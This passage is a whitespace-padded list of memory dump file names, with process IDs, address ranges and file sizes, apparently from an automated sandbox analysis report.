                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                    • memory/5252-330-0x0000000005000000-0x0000000005001000-memory.dmp
                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                    • memory/5252-334-0x0000000005030000-0x0000000005031000-memory.dmp
                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                    • memory/5252-346-0x00000000050B0000-0x00000000050B1000-memory.dmp
                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                    • memory/5252-347-0x00000000050C0000-0x00000000050C1000-memory.dmp
                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                    • memory/5252-348-0x00000000050D0000-0x00000000050D1000-memory.dmp
                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                    • memory/5252-350-0x00000000050F0000-0x00000000050F1000-memory.dmp
                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                    • memory/5252-349-0x00000000050E0000-0x00000000050E1000-memory.dmp
                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                    • memory/5252-336-0x0000000005050000-0x0000000005051000-memory.dmp
                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                    • memory/5252-332-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                    • memory/5272-358-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                    • memory/5280-322-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                    • memory/5280-325-0x00000000005C0000-0x000000000066E000-memory.dmp
                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      696KB

                                                                                                                                                                                                                                                                                    • memory/5296-323-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                    • memory/5296-327-0x0000000000680000-0x000000000072E000-memory.dmp
                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      696KB

                                                                                                                                                                                                                                                                                    • memory/5440-333-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                    • memory/5508-337-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                    • memory/5560-340-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                    • memory/5568-354-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                    • memory/5588-366-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                    • memory/5596-342-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                    • memory/5680-345-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                    • memory/5752-356-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                    • memory/5792-360-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                    • memory/5808-357-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                    • memory/5924-352-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                    • memory/5960-365-0x0000000000000000-mapping.dmp